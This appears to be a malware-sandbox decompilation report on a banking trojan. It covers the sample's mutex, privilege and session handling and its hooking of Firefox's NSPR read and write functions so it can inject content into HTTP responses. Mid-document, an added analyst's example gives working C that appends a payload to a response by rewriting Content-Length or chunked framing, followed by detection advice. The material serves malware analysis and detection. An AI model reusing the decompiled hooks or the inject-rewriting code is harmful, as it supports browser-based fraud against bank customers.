    								 *(_t78 + 4) = E0041687F(_t53 | 0xffffffff, _v8);
    								_t57 = E0041687F(_t55 | 0xffffffff, _v12);
    								__eflags =  *_t78;
    								 *(_t78 + 8) = _t57;
    								 *(_t78 + 0xc) = _t69;
    								if( *_t78 == 0) {
    									L18:
    									E00416421( *_t78);
    									E00416421( *(_t78 + 4));
    									E00416421( *(_t78 + 8));
    									E00416421(_t78);
    									goto L19;
    								}
    								__eflags =  *(_t78 + 4);
    								if( *(_t78 + 4) == 0) {
    									goto L18;
    								}
    								__eflags = _t57;
    								if(_t57 == 0) {
    									goto L18;
    								}
    								_t62 = E00417E56(0x80000, E0041D159, _t78);
    								__eflags = _t62;
    								if(_t62 != 0) {
    									goto L20;
    								}
    								goto L18;
    							}
    							L20:
    							_t80 = E004172F1(_t80, 3);
    							__eflags = _t80;
    						} while (_t80 != 0);
    						goto L21;
    						L22:
    						_t29 = WaitForSingleObject( *0x422e04, 0xea60);
    						__eflags = _t29 - 0x102;
    					} while (_t29 == 0x102);
    					goto L24;
    				}
    				return _t22 + 1;
    			}


    APIs
      • Part of subcall function 0040679A: CreateMutexW.KERNEL32(00422978,00000000,?,?,?,?,?), ref: 004067BB
    • GetCurrentThread.KERNEL32 ref: 0041D425
    • SetThreadPriority.KERNEL32(00000000), ref: 0041D42C
    • WaitForSingleObject.KERNEL32(0000EA60), ref: 0041D44A
    • CreateMutexW.KERNEL32(00422978,00000001,?,20000000), ref: 0041D50D
    • GetLastError.KERNEL32 ref: 0041D51D
    • CloseHandle.KERNEL32(00000000), ref: 0041D52B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateMutexThread$CloseCurrentErrorHandleLastObjectPrioritySingleWait
    • String ID: Global\%08X%08X%08X
    • API String ID: 3448221409-3239447729
    • Opcode ID: fcb061052ca67ac3872273e178e7d2ab1c4b1de1ee29fae26c9ff2fc6bdbeb51
    • Instruction ID: 9a7ac2e0a998d8810216bd4bcead9323f2a780a0af8eabb7b501b1bb6c75e5b0
    • Opcode Fuzzy Hash: fcb061052ca67ac3872273e178e7d2ab1c4b1de1ee29fae26c9ff2fc6bdbeb51
    • Instruction Fuzzy Hash: D341D3B0A00205BADB117BB69D86BEE7B66AF00718F10452BF511F62D2CB7CDDC1869C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E0040E73F(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    				struct HINSTANCE__* _v8;
    				char _v12;
    				char _v16;
    				_Unknown_base(*)()* _v20;
    				intOrPtr _v24;
    				char _v40;
    				char _v60;
    				char _v84;
    				char _v112;
    				void* __edi;
    				void* __esi;
    				struct HINSTANCE__* _t30;
    				_Unknown_base(*)()* _t42;
    				intOrPtr _t44;
    				intOrPtr _t50;
    				intOrPtr* _t55;
    				void* _t57;
    				void* _t58;
    				intOrPtr* _t59;
    				CHAR* _t61;
    				CHAR* _t62;
    				CHAR* _t63;
    				_Unknown_base(*)()* _t64;
    				WCHAR* _t66;
    				void* _t68;
    
    				_t58 = __ecx;
    				_t66 =  &_v112;
    				E004159A4(0xdd, _t66);
    				_t30 = LoadLibraryW(_t66);
    				_v8 = _t30;
    				if(_t30 == 0) {
    					return _t30;
    				}
    				_t61 =  &_v84;
    				E0041596E(0xde, _t61);
    				_t55 = GetProcAddress(_v8, _t61);
    				_t62 =  &_v40;
    				E0041596E(0xdf, _t62);
    				_v20 = GetProcAddress(_v8, _t62);
    				_t63 =  &_v60;
    				E0041596E(0xe0, _t63);
    				_t42 = GetProcAddress(_v8, _t63);
    				_t68 = 0;
    				_t64 = _t42;
    				if(_t55 == 0 || _v20 == 0 || _t64 == 0) {
    					L14:
    					return FreeLibrary(_v8);
    				} else {
    					_t44 = E00417AED(L"SeTcbPrivilege");
    					__imp__WTSGetActiveConsoleSessionId();
    					_v24 = _t44;
    					if(_t44 != 0xffffffff) {
    						E0040E6CE(_t58, 0, _t64, _t44, _a4, _a8);
    					}
    					_push( &_v12);
    					_push( &_v16);
    					_push(1);
    					_push(_t68);
    					_push(_t68);
    					if( *_t55() == 0) {
    						goto L14;
    					} else {
    						_t57 = 0;
    						if(_v12 <= _t68) {
    							L13:
    							_v20(_v16);
    							goto L14;
    						} else {
    							goto L8;
    						}
    						do {
    							L8:
    							_t59 = _t68 + _v16;
    							_t50 =  *((intOrPtr*)(_t59 + 8));
    							if(_t50 == 0 || _t50 == 4) {
    								_t51 =  *_t59;
    								if( *_t59 != _v24) {
    									E0040E6CE(_t59, _t68, _t64, _t51, _a4, _a8);
    								}
    							}
    							_t57 = _t57 + 1;
    							_t68 = _t68 + 0xc;
    						} while (_t57 < _v12);
    						goto L13;
    					}
    				}
    			}


    APIs
    • LoadLibraryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040F08D,?,?), ref: 0040E756
    • GetProcAddress.KERNEL32(?,?), ref: 0040E782
    • GetProcAddress.KERNEL32(?,?), ref: 0040E799
    • GetProcAddress.KERNEL32(?,?), ref: 0040E7B1
    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0040E83A
      • Part of subcall function 00417AED: GetCurrentThread.KERNEL32 ref: 00417AFD
      • Part of subcall function 00417AED: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040E7CE,SeTcbPrivilege), ref: 00417B04
      • Part of subcall function 00417AED: OpenProcessToken.ADVAPI32(000000FF,00000020,0040E7CE,?,?,?,?,0040E7CE,SeTcbPrivilege), ref: 00417B16
    • WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0040F08D,?,?,00000000), ref: 0040E7CE
      • Part of subcall function 0040E6CE: EqualSid.ADVAPI32(00000000,0040E847,?,0040E847,?,?,00000000), ref: 0040E6F3
      • Part of subcall function 0040E6CE: CloseHandle.KERNEL32(?,?,0040E847,?,?,00000000), ref: 0040E734
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
    • String ID: .exe$SeTcbPrivilege
    • API String ID: 1107370034-552748125
    • Opcode ID: 2d34295adaef3d712a96226b5ce2cc068409ba0fed4c5f4c6a6d0205ca932b42
    • Instruction ID: 9531a6a5f15540e4083edd58231464e52328da975ad28a0a2add8a010421a8c6
    • Opcode Fuzzy Hash: 2d34295adaef3d712a96226b5ce2cc068409ba0fed4c5f4c6a6d0205ca932b42
    • Instruction Fuzzy Hash: 32317C76A00118ABDF11ABA6CC849EFBB78EF44710F144827F801F7290C7759E50CBA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00406239(void* __ecx, void* __edx, void* __eflags) {
    				long _v8;
    				signed int _v12;
    				void _v532;
    				void* __edi;
    				void* __esi;
    				unsigned int _t22;
    				void* _t30;
    				void* _t39;
    				void* _t41;
    				WCHAR* _t42;
    				void* _t43;
    				void* _t46;
    
    				_t41 = __edx;
    				_t39 = __ecx;
    				InitializeCriticalSection(0x423148);
    				 *0x42313c = 0;
    				 *0x423144 = 0;
    				 *0x423140 = 0;
    				 *0x423138 = 0;
    				 *0x422fec = 0;
    				 *0x4230d4 = 0;
    				 *0x4230d8 = 0;
    				InitializeCriticalSection(0x4230bc);
    				_t42 =  &_v532;
    				E00406AB8(_t39, _t42, InitializeCriticalSection, 0);
    				_v12 = _v12 | 0xffffffff;
    				_v8 = 0x1fe;
    				_t43 = CreateFileW(_t42, 0x80000000, 1, 0, 3, 0, 0);
    				if(_t43 != 0xffffffff) {
    					if(ReadFile(_t43,  &_v532, _v8,  &_v8, 0) != 0) {
    						_v12 = _v8;
    					}
    					CloseHandle(_t43);
    				}
    				_t22 = _v12;
    				if(_t22 == 0xffffffff || (_t22 & 0x00000001) != 0) {
    					_t22 = 0;
    				}
    				 *((short*)(_t46 + (_t22 >> 1) * 2 - 0x210)) = 0;
    				E00411253( &_v532);
    				E0040C77A( &_v532);
    				 *0x423118 = 0;
    				 *0x423134 = 0;
    				InitializeCriticalSection(0x42311c);
    				E00408490(_t41);
    				if(GetModuleHandleW(L"nspr4.dll") == 0) {
    					_t30 = 0;
    				} else {
    					_t30 = E00409AF5(0, _t41, _t29);
    				}
    				if(_t30 != 0) {
    					 *0x423114 =  *0x423114 | 0x00000001;
    				}
    				E004098BE();
    				return 1;
    			}

    Address range: 0x00406239 to 0x00406359

    APIs
    • InitializeCriticalSection.KERNEL32(00423148,00000000,74B04EE0,00000000), ref: 00406250
    • InitializeCriticalSection.KERNEL32(004230BC), ref: 00406285
      • Part of subcall function 00406AB8: PathRenameExtensionW.SHLWAPI(?,.dat,?,004229A0,00000032,77E49EB0,?,00000000), ref: 00406B33
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 004062AD
    • ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 004062CA
    • CloseHandle.KERNEL32(00000000), ref: 004062DB
    • InitializeCriticalSection.KERNEL32(0042311C), ref: 00406322
    • GetModuleHandleW.KERNEL32(hH3@), ref: 0040632E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalInitializeSection$FileHandle$CloseCreateExtensionModulePathReadRename
    • String ID: hH3@
    • API String ID: 1155594396-602470440
    • Opcode ID: ca5451a366f9f094ffa8c8c67f81f39602a319e42b2caed63327b184f5c3008e
    • Instruction ID: f91805aae0f6b9fabe66f3127cc53c8790545bdc1383c7d088834e03b91c3b45
    • Opcode Fuzzy Hash: ca5451a366f9f094ffa8c8c67f81f39602a319e42b2caed63327b184f5c3008e
    • Instruction Fuzzy Hash: 01318431600208ABC720AFA99DC5AEA7BB8EB04315F50057FE515F32E1DB789F568B5C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E00409AF5(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
    				void* __ebx;
    				_Unknown_base(*)()* _t4;
    				void* _t9;
    				void* _t10;
    				void* _t11;
    				void* _t12;
    
    				_t12 = __edx;
    				_t11 = __ecx;
    				 *0x422360 = GetProcAddress(__edi, "PR_OpenTCPSocket");
    				 *0x422370 = GetProcAddress(__edi, "PR_Close");
    				 *0x422380 = GetProcAddress(__edi, "PR_Read");
    				_t4 = GetProcAddress(__edi, "PR_Write");
    				_push(0x422360);
    				_t9 = 4;
    				 *0x422390 = _t4;
    				_t10 = E0040982D(_t9, _t11, _t12);
    				if(_t10 != 0) {
    					E0040C833(__edi,  *0x422368,  *0x422378,  *0x422388,  *0x422398);
    				}
    				return _t10;
    			}

    Address range: 0x00409af5 to 0x00409b67

    APIs
    • GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 00409B03
    • GetProcAddress.KERNEL32(00000000,PR_Close), ref: 00409B10
    • GetProcAddress.KERNEL32(00000000,PR_Read), ref: 00409B1D
    • GetProcAddress.KERNEL32(00000000,PR_Write), ref: 00409B2A
      • Part of subcall function 0040982D: VirtualAllocEx.KERNEL32(000000FF,00000000,00000034,00003000,00000040,00000000,77E49EB0,?,?,00409AF3,00422020,00000000,00406353), ref: 00409864
      • Part of subcall function 0040C833: InitializeCriticalSection.KERNEL32(00422FAC,74B04EE0,00409B63,00422360), ref: 0040C849
      • Part of subcall function 0040C833: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040C885
      • Part of subcall function 0040C833: GetProcAddress.KERNEL32(PR_SetError), ref: 0040C897
      • Part of subcall function 0040C833: GetProcAddress.KERNEL32(PR_GetError), ref: 0040C8A9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$AllocCriticalInitializeSectionVirtual
    • String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
    • API String ID: 1833644279-3954199073
    • Opcode ID: 518b9cd3a212a064f0de57d48a9eb7895937e1e24e29b25bbd83ed6fe4c0ba14
    • Instruction ID: 8c5ad86b2b66b284ee94fc4aeeef2d256be4f1e040b1b3f3a0cab2fd5d52fef0
    • Opcode Fuzzy Hash: 518b9cd3a212a064f0de57d48a9eb7895937e1e24e29b25bbd83ed6fe4c0ba14
    • Instruction Fuzzy Hash: 5FF09071B403147ACB20AF76AD46E527FACB746B10384013BB900A72B0CBFD4542DA4C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E0040D022(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				char _v20;
    				void* _v24;
    				void* _v28;
    				char _v36;
    				char _v40;
    				signed int _v44;
    				void* _v48;
    				signed int _v52;
    				void* _v56;
    				intOrPtr _v60;
    				void* _v72;
    				void* _v80;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t99;
    				signed int _t100;
    				signed int _t101;
    				intOrPtr _t103;
    				void* _t104;
    				signed int _t107;
    				signed int _t108;
    				signed int _t110;
    				intOrPtr _t119;
    				void* _t131;
    				signed int _t139;
    				void* _t149;
    				struct _CRITICAL_SECTION* _t153;
    				intOrPtr _t155;
    				signed int _t168;
    				signed int _t174;
    				char _t176;
    				void* _t177;
    				intOrPtr _t179;
    				void* _t182;
    				signed int _t183;
    				intOrPtr _t186;
    				void* _t188;
    				signed int _t189;
    				void* _t191;
    				void* _t192;
    				void* _t193;
    				signed int _t195;
    				void* _t197;
    				void* _t199;
    
    				_t197 = (_t195 & 0xfffffff8) - 0x34;
    				_t99 = E004068C0();
    				_t179 = _a4;
    				if(_t99 == 0 || _a8 == 0 || _a12 <= 0) {
    					L40:
    					_t100 =  *0x422fd0(_t179, _a8, _a12);
    					goto L41;
    				} else {
    					_t153 = 0x422fac;
    					EnterCriticalSection(0x422fac);
    					_t101 = E0040C3C0(_t179);
    					if(_t101 == 0xffffffff) {
    						L39:
    						LeaveCriticalSection(_t153);
    						goto L40;
    					}
    					_t103 = _t101 * 0x38 +  *0x422fc8;
    					if( *((intOrPtr*)(_t103 + 0x30)) > 0) {
    						L32:
    						_t182 =  *((intOrPtr*)(_t103 + 0x30)) -  *((intOrPtr*)(_t103 + 0x34));
    						_t85 = _t103 + 0x2c; // -4337564
    						_t173 = _t85;
    						__eflags = _a12 - _t182;
    						_t183 =  <  ? _a12 : _t182;
    						_t104 = E0041645D(_a8,  *_t85 +  *((intOrPtr*)(_t103 + 0x34)), _t183);
    						 *((intOrPtr*)(_t104 + 0x34)) =  *((intOrPtr*)(_t104 + 0x34)) + _t183;
    						__eflags =  *((intOrPtr*)(_t104 + 0x34)) -  *((intOrPtr*)(_t104 + 0x30));
    						if( *((intOrPtr*)(_t104 + 0x34)) ==  *((intOrPtr*)(_t104 + 0x30))) {
    							E004164D4(E00416421( *_t173), _t173, 0, 0xc);
    						}
    						LeaveCriticalSection(_t153);
    						_t100 = _t183;
    						L41:
    						return _t100;
    					}
    					if( *((intOrPtr*)(_t103 + 0x10)) <= 0) {
    						goto L39;
    					}
    					LeaveCriticalSection(0x422fac);
    					_t107 =  *0x422fd0(_t179, _a8, _a12);
    					_t199 = _t197 + 0xc;
    					_v52 = _t107;
    					if(_t107 <= 0xffffffff) {
    						L38:
    						_t100 = _v52;
    						goto L41;
    					}
    					EnterCriticalSection(0x422fac);
    					_t108 = E0040C3C0(_t179);
    					_t174 = _t108;
    					if(_t174 == 0xffffffff) {
    						L35:
    						_push(8);
    						_push(0xffffe890);
    						L36:
    						 *0x422fa8();
    						_v52 = _v52 | 0xffffffff;
    						L37:
    						LeaveCriticalSection(_t153);
    						goto L38;
    					}
    					_t168 = _v52;
    					if(_t168 == 0) {
    						L11:
    						_t176 = _t174 * 0x38 +  *0x422fc8;
    						_v36 = _t176;
    						if(_t168 > 0) {
    							E0041645D( *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t176 + 0x18)), _a8, _t168);
    							 *((intOrPtr*)(_t176 + 0x18)) =  *((intOrPtr*)(_t176 + 0x18)) + _t168;
    						}
    						_t110 = E0040CC46(_t156,  &_v20,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t176 + 0x18)));
    						_v52 = _t110;
    						if(_t110 == 1) {
    							_t119 = E0040CDF0( &_v20,  *((intOrPtr*)(_t176 + 0x18)),  *((intOrPtr*)(_t176 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
    							_v60 = _t119;
    							if(_t119 == 1) {
    								if(E00410561( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)),  *((intOrPtr*)(_t176 + 4)),  &_v48,  &_v40) != 0) {
    									_t155 = _v40;
    									_t186 = E004163F1( *((intOrPtr*)(_t176 + 0x18)) -  *((intOrPtr*)(_t199 + 0x3c)) +  *((intOrPtr*)(_t199 + 0x38)) + _t155 + 0x14);
    									_v40 = _t186;
    									if(_t186 != 0) {
    										_t131 = E0041645D(_t186,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t199 + 0x38)));
    										_push(_t155);
    										if(( *(_t199 + 0x30) & 0x00000002) == 0) {
    											E00416BCA(_t199 + 0x28);
    											_t188 = E0041B3CD(_t186,  *((intOrPtr*)(_t199 + 0x40)), "Content-Length",  &_v36) + _v60;
    											E0041645D(_t188,  *((intOrPtr*)(_t199 + 0x18)), _t155);
    											_t189 = _t188 + _t155;
    											__eflags = _t189;
    										} else {
    											_push("%x\r\n");
    											_t191 = _t186 + _t131;
    											_t177 = 0xd;
    											_t192 = _t191 + E00417158(_t131, _t177, _t191);
    											E0041645D(_t192, _v48, _t155);
    											_t193 = _t192 + _t155;
    											E0041645D(_t193, "\r\n0\r\n\r\n", 7);
    											_t176 = _v60;
    											_t189 = _t193 + 7;
    										}
    										_t137 =  *((intOrPtr*)(_t176 + 0x18));
    										if( *((intOrPtr*)(_t199 + 0x3c)) !=  *((intOrPtr*)(_t176 + 0x18))) {
    											_t189 = _t189 + E0041645D(_t189,  *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t199 + 0x3c)), _t137 -  *((intOrPtr*)(_t199 + 0x3c)));
    										}
    										E00416421( *((intOrPtr*)(_t176 + 0x14)));
    										_t139 = _v44;
    										 *((intOrPtr*)(_t176 + 0x14)) = _t139;
    										 *((intOrPtr*)(_t176 + 0x18)) = _t189 - _t139;
    									}
    								}
    								_v44 = _v44 | 0xffffffff;
    								E00416421(_v48);
    							}
    							_t153 = 0x422fac;
    						}
    						if(_v52 <= 0) {
    							L29:
    							if(__eflags == 0) {
    								L31:
    								 *((intOrPtr*)(_t176 + 0x2c)) =  *((intOrPtr*)(_t176 + 0x14));
    								 *((intOrPtr*)(_t176 + 0x30)) =  *((intOrPtr*)(_t176 + 0x18));
    								 *((intOrPtr*)(_t176 + 0x34)) = 0;
    								 *((intOrPtr*)(_t176 + 0x14)) = 0;
    								 *((intOrPtr*)(_t176 + 0x18)) = 0;
    								E00410A7F( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)));
    								_t103 = _v40;
    								 *((intOrPtr*)(_t176 + 0x10)) = 0;
    								 *((intOrPtr*)(_t176 + 0xc)) = 0;
    								goto L32;
    							}
    							__eflags = _v44 - 0xffffffff;
    							if(_v44 != 0xffffffff) {
    								goto L37;
    							}
    							goto L31;
    						} else {
    							if(_v44 != 0) {
    								__eflags = _v52;
    								goto L29;
    							}
    							_push(0);
    							_push(0xffffe892);
    							goto L36;
    						}
    					}
    					_t149 = _t108 * 0x38 +  *0x422fc8;
    					_t156 =  *((intOrPtr*)(_t149 + 0x18)) + _t168;
    					_t11 = _t149 + 0x14; // -4337588
    					if(E004163AC( *((intOrPtr*)(_t149 + 0x18)) + _t168, _t11) == 0) {
    						goto L35;
    					}
    					_t168 = _v52;
    					goto L11;
    				}
    			}

    Address range: 0x0040d022 to 0x0040d33b

    APIs
      • Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8
    • EnterCriticalSection.KERNEL32(00422FAC), ref: 0040D05E
    • LeaveCriticalSection.KERNEL32(00422FAC), ref: 0040D08C
    • EnterCriticalSection.KERNEL32(00422FAC), ref: 0040D0B0
    • LeaveCriticalSection.KERNEL32(00422FAC,00000000,?,00000000), ref: 0040D2F3
    • LeaveCriticalSection.KERNEL32(00422FAC), ref: 0040D312
      • Part of subcall function 0041B3CD: StrCmpNIA.SHLWAPI(00000000,?,?,00000000,?,-00422FC8,?,00000000), ref: 0041B427
      • Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434
    • LeaveCriticalSection.KERNEL32(00422FAC), ref: 0040D31F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$Leave$Enter$FreeHeapObjectSingleWait
    • String ID: 0$%x$Content-Length
    • API String ID: 4067213518-3838797520
    • Opcode ID: 65d216880ea404408304fc33fecaaf6347815953f6bc3d160ff28ffe37a3f1e7
    • Instruction ID: b79c8f3c0824c7d15e525eba73c27aadf84a4689f865ac7025aba4dc54dbab24
    • Opcode Fuzzy Hash: 65d216880ea404408304fc33fecaaf6347815953f6bc3d160ff28ffe37a3f1e7
    • Instruction Fuzzy Hash: E291A072904316AFC710DF65CD8196ABBB5FF84314F01462EF850A72A1C738E999CBDA
    Uniqueness

    Uniqueness Score: -1.00%
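    Analyst's worked example, added here; it is not part of the sandbox output and not the sample's code. E0040D022 is the replacement PR_Read. It first lets the original function run through the saved pointer at 0x422fd0, then appends the returned bytes to a per-socket record (0x38-byte entries at *0x422fc8, selected by E0040C3C0 under the critical section at 0x422fac). E0040CC46 and E0040CDF0 decide whether a complete HTTP response has accumulated, and E00410561 asks the inject engine for content. When content comes back a new buffer is built: either the Content-Length value is rewritten (E0041B3CD, the StrCmpNIA subcall) and the data appended, or, when bit 0x2 of the parsed flags at _t199+0x30 is set, the data is emitted as a chunk using "%x\r\n", the data and "\r\n0\r\n\r\n". The new buffer is parked in the record at offsets 0x2c/0x30/0x34 (pointer, size, consumed) so later PR_Read calls are served from it (the L32 path). The two PR_SetError calls pass -6000 and -5998, which are PR_OUT_OF_MEMORY_ERROR and PR_WOULD_BLOCK_ERROR in NSPR's prerror.h; the 8 passed with the first is ERROR_NOT_ENOUGH_MEMORY as the OS error. Exactly which byte ranges the stack slots _t199+0x38 and _t199+0x3c delimit is not recoverable from the decompilation, so the C below implements both framings in their standard form on a complete response: find the header block, add the payload length to Content-Length, or replace the terminating zero chunk with a payload chunk followed by a new terminator. An incomplete or mismatched response is left untouched, as the hook does when E0040CC46 returns something other than 1. The responses, payload and buffer sizes are constructed for the example.

```c
/* Added example, not the sample's code: the two body-framing rewrites seen in
 * E0040D022, applied to a complete HTTP response held in memory.
 * Assumptions: headers end at the first CRLFCRLF; a chunked body ends with the
 * usual "0\r\n\r\n" terminator; response and payload below are constructed. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Case-insensitive prefix compare, the service StrCmpNIA gives the sample. */
static int ieq_n(const char *a, const char *b, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i])) return 0;
    return 1;
}

/* Finds `name` at the start of a header line inside the header block and
 * returns a pointer to its value (leading spaces skipped), or NULL. */
static const char *find_header(const char *hdr, size_t hdr_len, const char *name) {
    size_t n = strlen(name);
    const char *p = hdr, *end = hdr + hdr_len;
    while (p < end) {
        if ((size_t)(end - p) > n && ieq_n(p, name, n) && p[n] == ':') {
            p += n + 1;
            while (p < end && *p == ' ') p++;
            return p;
        }
        const char *nl = memchr(p, '\n', (size_t)(end - p));
        if (!nl) break;
        p = nl + 1;
    }
    return NULL;
}

/* Appends `payload` to the body of `resp` without breaking its framing.
 * Writes the rewritten response to `out` and returns its length, or -1 when
 * the response is incomplete, mismatched, or framed in a way not handled here. */
int inject_into_response(const char *resp, size_t resp_len,
                         const char *payload, size_t payload_len,
                         char *out, size_t out_cap)
{
    const char *body = NULL;
    for (size_t i = 0; i + 4 <= resp_len; i++)
        if (memcmp(resp + i, "\r\n\r\n", 4) == 0) { body = resp + i + 4; break; }
    if (!body) return -1;
    size_t hdr_len = (size_t)(body - resp), body_len = resp_len - hdr_len, n = 0;
    if (resp_len + payload_len + 32 > out_cap) return -1;  /* room for new digits and chunk framing */

    const char *te = find_header(resp, hdr_len, "Transfer-Encoding");
    if (te && ieq_n(te, "chunked", 7)) {
        /* Chunked path of the hook: "%x\r\n" + data + "\r\n0\r\n\r\n". The old
         * terminator is dropped so the payload becomes the last real chunk. */
        if (body_len < 5 || memcmp(resp + resp_len - 5, "0\r\n\r\n", 5) != 0) return -1;
        n = resp_len - 5;
        memcpy(out, resp, n);
        n += (size_t)sprintf(out + n, "%zx\r\n", payload_len);
        memcpy(out + n, payload, payload_len);  n += payload_len;
        memcpy(out + n, "\r\n0\r\n\r\n", 7);     n += 7;
        return (int)n;
    }

    const char *cl = find_header(resp, hdr_len, "Content-Length");
    if (!cl) return -1;
    /* Content-Length path: keep everything before the digits, write the new
     * value, keep everything after, then append the payload. */
    char *endp;
    unsigned long old_len = strtoul(cl, &endp, 10);
    const char *after = endp;
    if (after == cl || old_len != body_len) return -1;   /* not a complete response: leave it alone */
    n = (size_t)(cl - resp);
    memcpy(out, resp, n);
    n += (size_t)sprintf(out + n, "%lu", old_len + (unsigned long)payload_len);
    size_t rest = (size_t)(resp + resp_len - after);
    memcpy(out + n, after, rest);             n += rest;
    memcpy(out + n, payload, payload_len);    n += payload_len;
    return (int)n;
}

int main(void) {
    /* Constructed response and inject payload. */
    static const char resp[] = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 5\r\n\r\nhello";
    static const char payload[] = "<b>x</b>";
    char out[256];
    int n = inject_into_response(resp, sizeof resp - 1, payload, sizeof payload - 1, out, sizeof out);
    if (n > 0) fwrite(out, 1, (size_t)n, stdout);
    return n > 0 ? 0 : 1;
}
```

    Feeding a captured response and the inject text from a config through this shows the exact bytes the browser would render. A network sensor never sees that rewrite, because it happens inside the browser process above the TLS layer; detection therefore belongs on the endpoint, for instance by diffing the nspr4.dll export prologues in memory against the file on disk.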

    C-Code - Quality: 79%
    			E00413D4A(char* __ecx, char* __edx, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				char* _v20;
    				char _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				char _v64;
    				char _v84;
    				char _v108;
    				char _v152;
    				char _v180;
    				char _v252;
    				short _v766;
    				char _v772;
    				short _v1292;
    				void* __edi;
    				void* __esi;
    				void* _t46;
    				void* _t48;
    				void* _t53;
    				void* _t57;
    				void* _t59;
    				void* _t61;
    				void* _t68;
    				void* _t70;
    				void* _t75;
    				WCHAR* _t100;
    				signed int _t101;
    				WCHAR* _t103;
    				char* _t108;
    				intOrPtr _t109;
    				void* _t112;
    				intOrPtr _t125;
    
    				_t99 = __edx;
    				_t98 = __ecx;
    				E004164D4( &_v12,  &_v12, 0, 8);
    				_t46 = 0x6a;
    				E004159A4(_t46,  &_v252);
    				_t48 = 0x6b;
    				E004159A4(_t48,  &_v108);
    				_t100 =  &_v772;
    				_t53 = E0041A545(0x80000001, _t98, _t100,  &_v252,  &_v108, 0x104);
    				if(_t53 != 0xffffffff) {
    					_t115 = _t53;
    					if(_t53 != 0) {
    						ExpandEnvironmentStringsW(_t100,  &_v1292, 0x104);
    						E00413B5E(_t99, _t115,  &_v1292,  &_v12);
    						PathRemoveFileSpecW( &_v1292);
    					}
    				}
    				_t101 = 0;
    				if(_v8 != 0) {
    					L14:
    					_t125 = _v8;
    					goto L15;
    				} else {
    					_t57 = 0x6d;
    					E004159A4(_t57,  &_v64);
    					_t59 = 0x6e;
    					E004159A4(_t59,  &_v152);
    					_t108 =  &_v84;
    					_t61 = 0x6f;
    					E004159A4(_t61, _t108);
    					_v24 =  &_v64;
    					_v20 =  &_v152;
    					_v40 = 0x24;
    					_v36 = 0x1a;
    					_v32 = 0x26;
